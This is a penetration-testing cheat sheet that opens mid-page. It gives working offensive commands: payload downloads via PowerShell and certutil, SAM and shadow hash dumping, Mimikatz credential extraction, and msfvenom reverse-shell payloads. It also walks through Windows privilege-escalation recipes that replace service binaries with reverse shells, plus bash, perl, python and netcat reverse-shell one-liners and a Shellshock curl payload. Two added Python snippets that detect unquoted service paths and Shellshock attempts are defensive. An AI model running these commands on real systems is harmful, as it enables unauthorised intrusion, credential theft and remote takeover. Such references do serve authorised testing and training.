# Python script to a standalone .exe
pyinstaller --onefile <SCRIPT>.py
# Windows .exe on Linux, linking Winsock (needed by most reverse-shell exploits)
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
```
Cross compile
```bash
# 32-bit binary that also loads on old glibc (emits both .hash and .gnu.hash sections)
gcc -m32 -Wall -Wl,--hash-style=both -o gimme.o gimme.c
```
DICTIONARY GENERATION
```bash
# Wordlist built from a website's content (minimum word length, spidering depth)
cewl -m <WORDS_SIZE> --with-numbers -w dictiFromWebsite <URL> -d <DEPTH>
# Pattern-based: 5-character words "Test" + one character of the charset (@ is replaced by each charset character)
crunch 5 5 -f /usr/share/crunch/charset.lst mixalpha-numeric-all -t Test@ -o passwords.txt
```
FILE TRANSFER
Linux
```bash
# PYTHON
python -m SimpleHTTPServer <PORT>
python3 -m http.server <PORT>
python2.7 -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"
# FTP (anonymous; -w makes it writable)
sudo python3 -m pyftpdlib -p 21 -w
# SMB
sudo smbserver.py -smb2support liodeus .
# WGET (-O is the output file; a lowercase -o only redirects the log)
wget <URL> -O <OUT_FILE>
# CURL
curl <URL> -o <OUT_FILE>
# NETCAT
nc -lvnp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# SCP
scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_FILE>
```
Windows
```cmd
# FTP (script the built-in client; each echo appends one line to ftp.txt)
echo open <IP> 21 > ftp.txt
echo anonymous>> ftp.txt
echo password>> ftp.txt
echo binary>> ftp.txt
echo GET <FILE> >> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
# SMB
# Linux -> Windows
copy \\<IP>\<PATH>\<FILE> .
# Windows -> Linux
copy <FILE> \\<IP>\<PATH>\
# Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('<URL>', '<DESTINATION_FILE>')
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('<URL>')
powershell "wget <URL> -OutFile <OUT_FILE>"
# Python
python.exe -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"
# CertUtil
certutil.exe -urlcache -split -f "<URL>"
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# CURL
curl <URL> -o <OUT_FILE>
```
GIT
Download .git
```bash
# GitTools: dump an exposed .git directory, then recover the files from the objects
mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>
mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>
```
HASHES
Windows
```cmd
# Export the hives (needs admin), then dump with samdump2 (SYSTEM first: it holds the boot key)
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System
samdump2 System SAM > hashes
```
Linux
```bash
unshadow passwd shadow > hashes
```
MIMIKATZ
```text
privilege::debug          # required first for sekurlsa:: and lsadump::; add token::elevate before lsadump::sam/secrets/cache from an admin (non-SYSTEM) shell
sekurlsa::logonpasswords
sekurlsa::tickets /export
kerberos::list /export
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
```
MISCELLANEOUS
Get a Windows path without spaces
```cmd
# path.cmd: %~s1 expands the first argument to its 8.3 short name
@echo off
echo %~s1
```
```cmd
path.cmd "C:\Program Files (x86)\Common Files\test.txt"
C:\PROGRA~2\COMMON~1\test.txt
```
The output is a valid path without spaces (useful where quoting is impossible, e.g. unquoted service paths).
MSFVENOM PAYLOAD
Linux
```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
```
Windows
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
```
PHP
```bash
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
# The raw output has no open tag; prepend <?php so the file executes as a PHP page
sed -i '1s/^/<?php /' shell.php
```
ASP
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
```
JSP
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
```
WAR
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
```
Python
```bash
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
```
Bash
```bash
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
```
Perl
```bash
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl
```
Listener
```text
use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
```
Netcat
```bash
nc -lvnp <PORT>
```
PASSWORD CRACKING
Online
Look up MD5, SHA1, MySQL, NTLM, SHA256 and SHA512 hashes:
https://hashes.com/en/decrypt/hash
Hashcat
Linux password
```bash
# -m 1800: sha512crypt ($6$), the default on most Linux distributions
hashcat -m 1800 -a 0 hash.txt rockyou.txt
hashcat -m 1800 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule
```
Windows password
```bash
# -m 1000: NTLM
hashcat -m 1000 -a 0 hash.txt rockyou.txt
hashcat -m 1000 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule
```
Others
```bash
# Find the mode number from the hash format
hashcat --example-hashes | grep -i '<BEGINNING_OF_HASH>'
```
Rules
https://github.com/NotSoSecure/password_cracking_rules
John
```bash
john --wordlist=<PASSWORDS_LIST> hash.txt
```
PIVOTING
Sshuttle
```bash
# -r is the SSH hop; the given subnet(s) are routed through it transparently
sshuttle -r <USER>@<IP> <SUBNET>/CIDR
```
Proxychains
```bash
# Dynamic SOCKS proxy on local port 9050 (proxychains' default)
ssh -f -N -D 9050 <USER>@<IP>
proxychains <COMMAND>
```
Interesting link
https://artkond.com/2017/03/23/pivoting-guide/
PRIVILEGE ESCALATION
Linux
Enumeration scripts
```bash
bash LinEnum.sh
bash lse.sh -l 1
bash linpeas.sh
python linuxprivchecker.py
./unix-privesc-check standard
```
Vulnerability scan
```bash
# linux-exploit-suggester (les2.pl is the Perl version)
perl les2.pl
bash les.sh
```
Suid checker
```bash
python suid3num.py
```
https://gtfobins.github.io/
Methodology to follow
https://guif.re/linuxeop
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
Checklist:
- sudo -l
- Kernel exploits
- OS exploits
- Password reuse (mysql, .bash_history, 000-default.conf, ...)
- Known binaries with the suid flag that are interactive (nmap)
- Custom suid binaries that call other binaries or allow command execution
- Writable files owned by root that get executed (cron jobs)
- MySQL running as root
- Vulnerable services (chkrootkit, logrotate)
- Writable /etc/passwd
- Readable .bash_history
- SSH private keys
- Ports listening on localhost
- /etc/fstab
- /etc/exports
- /var/mail
- Processes running as another user (root) that execute something you can modify
- SSH public key + predictable PRNG
- apt update hooking (Pre-Invoke)
Windows
Enumeration scripts
General scans
```cmd
winPEAS.exe
windows-privesc-check2.exe
Seatbelt.exe -group=all
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
Powerless.bat
winPEAS.bat
```
Search for CVE
```cmd
# Windows Exploit Suggester (--update downloads the mssb database)
systeminfo > systeminfo.txt
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DATE>-mssb.xlsx --systeminfo systeminfo.txt
# WES-NG (for recent Windows versions, where the mssb database is no longer maintained)
systeminfo > systeminfo.txt
wmic qfe > qfe.txt
python wes.py -u
python wes.py systeminfo.txt qfe.txt
# Sherlock
powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"
```
Post exploitation
```cmd
lazagne.exe all
SharpWeb.exe
mimikatz.exe
```
JuicyPotato (SeImpersonate or SeAssignPrimaryToken)
If the user holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (typical for service accounts such as IIS or MSSQL), JuicyPotato gets you SYSTEM on builds up to Windows 10 1803 / Server 2016; newer builds need a successor such as PrintSpoofer or RoguePotato.
```cmd
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t *
# If the default CLSID fails, pick one for the target OS version from the list below
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t * -c <CLSID>
```
CLSID list: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
Methodology to follow
https://guif.re/windowseop
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://mysecurityjournal.blogspot.com/p/client-side-attacks.html
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
Autorun
Detection
```text
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for modifiable registry autoruns and configs...
Key : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program
Path : "C:\Program Files\Autorun Program\program.exe"
ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files\Autorun Program\program.exe; IdentityReference=Everyone}
```
or
```text
winPEAS.exe
[+] Autorun Applications(T1010)
Folder: C:\Program Files\Autorun Program
File: C:\Program Files\Autorun Program\program.exe
FilePerms: Everyone [AllAccess]
```
Exploitation
```bash
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvnp <PORT>
```
```cmd
# Victim: overwrite the autorun binary (keep a copy of the original to restore afterwards)
cd "C:\Program Files\Autorun Program\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')
```
The binary runs at logon with the privileges of whoever logs in, so for an elevated shell you have to wait for a member of the Administrators group to log in.
AlwaysInstallElevated
Detection
```text
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for AlwaysInstallElevated registry key...
AbuseFunction : Write-UserAddMSI
```
or
```cmd
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
```
If AlwaysInstallElevated is 1 in both hives it's vulnerable: any MSI the user installs runs as SYSTEM.
or
```text
winPEAS.exe
[+] Checking AlwaysInstallElevated(T1012)
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
```
Exploitation
```bash
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > program.msi
sudo python -m SimpleHTTPServer 80
sudo nc -lvnp <PORT>
```
```cmd
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.msi', 'C:\Temp\program.msi')
msiexec /quiet /qn /i C:\Temp\program.msi
```
Executable Files
Detection
```text
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service executable and argument permissions...
ServiceName : filepermsvc
Path : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'filepermsvc'
CanRestart : True
```
or
```text
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
filepermsvc(Apache Software Foundation - File Permissions Service)["C:\Program Files\File Permissions Service\filepermservice.exe"] - Manual - Stopped
File Permissions: Everyone [AllAccess]
```
Exploitation
```bash
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvnp <PORT>
```
```cmd
# Victim: replace the service binary (StartName is LocalSystem, so the shell comes back as SYSTEM)
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', 'C:\Temp\program.exe')
copy /y c:\Temp\program.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc
```
Startup applications
Detection
```text
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
                                                   TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
                                                   NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                   BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                   BUILTIN\Users:(I)(OI)(CI)(RX)
                                                   Everyone:(I)(OI)(CI)(RX)
```
If a group you belong to has full access (F), or modify (M) / write (W), on the directory (here BUILTIN\Users), it's vulnerable.
Exploitation
```bash
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > program.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvnp <PORT>
```
```cmd
# Victim
cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/program.exe', '.\program.exe')
```
Everything in the all-users Startup folder runs at logon with the logging-in user's privileges, so for an elevated shell wait for a member of the Administrators group to log in.
Weak service permission
Detection
```cmd
# Find all services authenticated users have modify access to
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
# SERVICE_ALL_ACCESS (or SERVICE_CHANGE_CONFIG) means the binary path can be changed: vulnerable
# Find all weak folder permissions per drive
accesschk.exe /accepteula -uwdqs Users c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
# Find all weak file permissions per drive
accesschk.exe /accepteula -uwqs Users c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
```
or
```text
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking service permissions...
ServiceName : daclsvc
Path : "C:\Program Files\DACL Service\daclservice.exe"
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart : True
```
or
```text
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped
YOU CAN MODIFY THIS SERVICE: WriteData/CreateFiles
[+] Modifiable Services(T1007)
LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
daclsvc: WriteData/CreateFiles
```
Exploitation
```bash
# Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvnp <PORT>
```
```cmd
# Victim: point the service at netcat (the space after binpath= is mandatory), then (re)start it
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
sc config <SERVICENAME> binpath= "<PATH>\nc.exe <IP> <PORT> -e cmd.exe"
sc start <SERVICENAME>
# or
net start <SERVICENAME>
```
Unquoted service paths
Detection
| powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for unquoted service paths...
ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\;IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True
ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True
|
or
| winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
|
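The "No quotes and Space detected" finding above is a property of the ImagePath string alone, so it can be checked offline from a service export (`sc qc` or `wmic service get name,pathname`). The following is an added example, not part of the original page and not PowerUp or winPEAS code, that reproduces the check over a constructed set of ImagePaths: for an unquoted path containing spaces it lists the alternative executables the Service Control Manager would look for first, and the parent directories that must not be writable by standard users, which is what PowerUp's ModifiablePath entry (C:\ above) reports. Only the unquotedsvc path comes from the page; the other service names and paths are constructed.

```python
"""Flag unquoted service image paths and the directories they expose.

Added example, not part of the original cheat sheet and not PowerUp or
winPEAS code. Given a service's ImagePath as the SCM stores it, it returns
every alternative executable CreateProcess would try before the intended
one, and the parent directories whose write permissions must be audited.
SAMPLE_SERVICES is constructed for the example.
"""
import ntpath
from typing import Dict, List

# Constructed sample: service name -> ImagePath. Only unquotedsvc's path
# is taken from the winPEAS output above.
SAMPLE_SERVICES: Dict[str, str] = {
    "unquotedsvc": r"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe",
    "quotedsvc": r'"C:\Program Files\Quoted Service\quotedservice.exe" -run',
    "svchost": r"C:\Windows\System32\svchost.exe -k netsvcs",
}


def unquoted_path_candidates(image_path: str) -> List[str]:
    """Return the executables CreateProcess would look for, in order,
    before reaching the real one. An empty list means the path is safe:
    it is quoted, or the executable portion contains no space."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Only the part up to the executable matters; arguments follow it.
    lower = path.lower()
    end = lower.find(".exe")
    exe_part = path if end == -1 else path[: end + 4]
    return [exe_part[:i] + ".exe" for i, ch in enumerate(exe_part) if ch == " "]


def directories_to_audit(image_path: str) -> List[str]:
    """Parent directories in which a standard user must not be able to
    create files; these correspond to PowerUp's ModifiablePath entries."""
    seen: List[str] = []
    for cand in unquoted_path_candidates(image_path):
        parent = ntpath.dirname(cand)
        if parent not in seen:
            seen.append(parent)
    return seen


def audit_services(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each vulnerable service to the executables it would load instead."""
    return {
        name: cands
        for name, path in services.items()
        if (cands := unquoted_path_candidates(path))
    }


if __name__ == "__main__":
    for name, cands in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: {len(cands)} unquoted prefix(es)")
        for d in directories_to_audit(SAMPLE_SERVICES[name]):
            print(f"  check ACL on {d}")
```

The fix on the host side is simply to quote the path (`sc config <SERVICENAME> binpath= "\"C:\...\service.exe\""`); the directory list is there so that a finding on a path whose parents are all admin-only can be deprioritised.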
Exploitation
| # Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe', '.\Common.exe')
sc start unquotedsvc
|
Hot potato
Exploitation
| # Attacker
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', '.\nc.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Tater.ps1', '.\Tater.ps1')
powershell -exec bypass -command "& { Import-Module .\Tater.ps1; Invoke-Tater -Trigger 1 -Command '.\nc.exe <IP> <PORT> -e cmd.exe' }"
|
CVE
| # Already compiled exploits
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/abatchy17/WindowsExploits
|
Windows XP
| CVE | Description |
|---|---|
| CVE-2002-1214 | ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS |
| CVE-2003-0352 | ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service |
| CVE-2003-0533 | MS04-011 - ms04_011_lsass - exploits a stack buffer overflow in the LSASS service |
| CVE-2003-0719 | ms04_011_pct - exploits a buffer overflow in the Microsoft Windows SSL PCT protocol stack - Private communication target overflow |
| CVE-2003-0812 | ms03_049_netapi - exploits a stack buffer overflow in the NetApi32 |
| CVE-2003-0818 | ms04_007_killbill - vulnerability in the bit string decoding code in the Microsoft ASN.1 library |
| CVE-2003-0822 | ms03_051_fp30reg_chunked - exploit for the chunked encoding buffer overflow described in MS03-051 |
| CVE-2004-0206 | ms04_031_netdde - exploits a stack buffer overflow in the NetDDE service |
| CVE-2010-3138 | EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse |
| CVE-2010-3147 | EXPLOIT-DB 14745 - Untrusted search path vulnerability in wab.exe - allows local users to gain privileges via a Trojan horse |
| CVE-2010-3970 | ms11_006_createsizeddibsection - exploits a stack-based buffer overflow in thumbnails within .MIC files - code execution |
| CVE-2011-1345 | Internet Explorer does not properly handle objects in memory - allows remote execution of code via object |
| CVE-2011-5046 | EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input - allows remote code execution |
| CVE-2012-4349 | Unquoted windows search path - Windows provides the capability of including spaces in path names - can be root |
Windows 7
| CVE | Description |
|---|---|
| CVE-2010-0232 | ms10_015_kitrap0d - create a new session with SYSTEM privileges via the KiTrap0D exploit |
| CVE-2010-2568 | ms10_046_shortcut_icon_dllloader - exploits a vulnerability in the handling of Windows Shortcut files (.LNK) - run a payload |
| CVE-2010-2744 | EXPLOIT-DB 15894 - kernel-mode drivers in windows do not properly manage a window class - allows privilege escalation |
| CVE-2010-3227 | EXPLOIT-DB - Stack-based buffer overflow in the UpdateFrameTitleForDocument method - arbitrary code execution |
| CVE-2014-4113 | ms14_058_track_popup_menu - exploits a NULL Pointer Dereference in win32k.sys - arbitrary code execution |
| CVE-2014-4114 | ms14_060_sandworm - exploits a vulnerability found in Windows Object Linking and Embedding - arbitrary code execution |
| CVE-2015-0016 | ms15_004_tswbproxy - abuses a process creation policy in Internet Explorer's sandbox - code execution |
| CVE-2018-8494 | remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input |
Windows 8
| CVE | Description |
|---|---|
| CVE-2013-0008 | ms13_005_hwnd_broadcast - attacker can broadcast commands from lower Integrity Level process to a higher one - privilege escalation |
| CVE-2013-1300 | ms13_053_schlamperei - kernel pool overflow in Win32k - local privilege escalation |
| CVE-2013-3660 | ppr_flatten_rec - exploits EPATHOBJ::pprFlattenRec due to the usage of uninitialized data - allows memory corruption |
| CVE-2013-3918 | ms13_090_cardspacesigninhelper - exploits CardSpaceClaimCollection class from the icardie.dll ActiveX control - code execution |
| CVE-2013-7331 | ms14_052_xmldom - uses Microsoft XMLDOM object to enumerate a remote machine's filenames |
| CVE-2014-6324 | ms14_068_kerberos_checksum - exploits the Microsoft Kerberos implementation - privilege escalation |
| CVE-2014-6332 | ms14_064_ole_code_execution - exploits the Windows OLE Automation array vulnerability |
| CVE-2014-6352 | ms14_064_packager_python - exploits Windows Object Linking and Embedding (OLE) - arbitrary code execution |
| CVE-2015-0002 | ntapphelpcachecontrol - NtApphelpCacheControl Improper Authorization Check - privilege escalation |
Windows 10
| CVE | Description |
|---|---|
| CVE-2015-0057 | exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine |
| CVE-2015-1769 | MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege |
| CVE-2015-2426 | ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver |
| CVE-2015-2479 | MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege |
| CVE-2015-2513 | MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution |
| CVE-2015-2423 | MS15-088 - Unsafe Command Line Parameter Passing - Could Allow Information Disclosure |
| CVE-2015-2431 | MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution |
| CVE-2015-2441 | MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution |
Windows Server 2003
| CVE | Description |
|---|---|
| CVE-2008-4250 | ms08_067_netapi - exploits a parsing flaw in the path canonicalization code of NetAPI32.dll - bypassing NX |
| CVE-2017-8487 | allows an attacker to execute code when a victim opens a specially crafted file - remote code execution |
PROOFS
Linux
| echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
|
Windows
| echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
|
REVERSE SHELL
| # Download
git clone https://github.com/ShutdownRepo/shellerator
cd shellerator
# Install requirements
pip3 install --user -r requirements.txt
# Executable from anywhere
sudo cp shellerator.py /bin/shellerator
|
Bash
| bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
|
Perl
| perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
Python
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
Netcat
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f
|
More reverse shell
| http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
|
Interactive shell
| # Python
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Python (from an interpreter prompt)
import os; os.system('/bin/bash')
# Bash
/bin/bash -i
# Perl
perl -e 'exec "/bin/bash"'
# Ruby
exec "/bin/bash"
# Lua
os.execute('/bin/bash')
|
Adjust Interactive shell
| stty size # Find your terminal size -> 50 235
Ctrl-Z # Background the remote shell
stty raw -echo # Disable local echo
fg
export SHELL=bash
export TERM=xterm # or: export TERM=xterm-256color
stty rows 50 columns 235
|
SHELLSHOCK
| curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" <URL>/cgi-bin/<SCRIPT>
|
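On the defending side, the Shellshock trigger is the `() {` function-definition marker arriving in an HTTP header such as User-Agent or Referer, which makes attempts easy to spot in web server access logs. The following is an added example (not from the original page) that scans combined-format log lines for that marker and reports the client, the header it arrived in and the request; the three log lines are constructed for the example, the first modelled on the curl request above.

```python
"""Find Shellshock (CVE-2014-6271) attempts in combined-format access logs.

Added example, not part of the original cheat sheet. It looks for the
Bash function-definition marker "() {" in the Referer and User-Agent
fields of Apache/nginx combined-format log lines. SAMPLE_LOG is
constructed for the example.
"""
import re
from typing import List, Tuple

# The marker every Shellshock payload has to start with, allowing for
# optional whitespace between the tokens.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Combined log format:
# ip - - [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample: one payload in User-Agent, one benign browser hit,
# one payload in Referer.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
198.51.100.4 - - [10/Oct/2020:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [10/Oct/2020:13:57:12 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; /bin/bash -c 'id'" "curl/7.68.0"
"""


def find_shellshock(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, field, request) for each line whose Referer or
    User-Agent carries the function-definition marker. Lines that do not
    parse as combined format are skipped rather than raising."""
    hits: List[Tuple[str, str, str]] = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), field, m.group("request")))
    return hits


if __name__ == "__main__":
    for ip, field, request in find_shellshock(SAMPLE_LOG):
        print(f"{ip}\t{field}\t{request}")
```

A 200 status on a hit (as in the first sample line) is the one to escalate: a patched Bash returns the header unharmed and the CGI script usually still succeeds, so the status alone does not tell you whether the injection ran, but a vulnerable host paired with a `/cgi-bin/` target is the combination to check.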
USEFUL LINUX COMMANDS
Find a file
| locate <FILE>
find / -name "<FILE>"
|
Active connections
| netstat -antup
|
List all SUID files
| find / -perm -4000 2>/dev/null
|
Determine the current version of Linux
| cat /etc/issue
uname -a
|
List processes running
| ps aux
|
List the allowed (and forbidden) commands for the invoking user
| sudo -l
|
USEFUL WINDOWS COMMANDS
| net config Workstation
systeminfo
net users
ipconfig /all
netstat -ano
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s *pass* == *cred* == *vnc* == *.config*
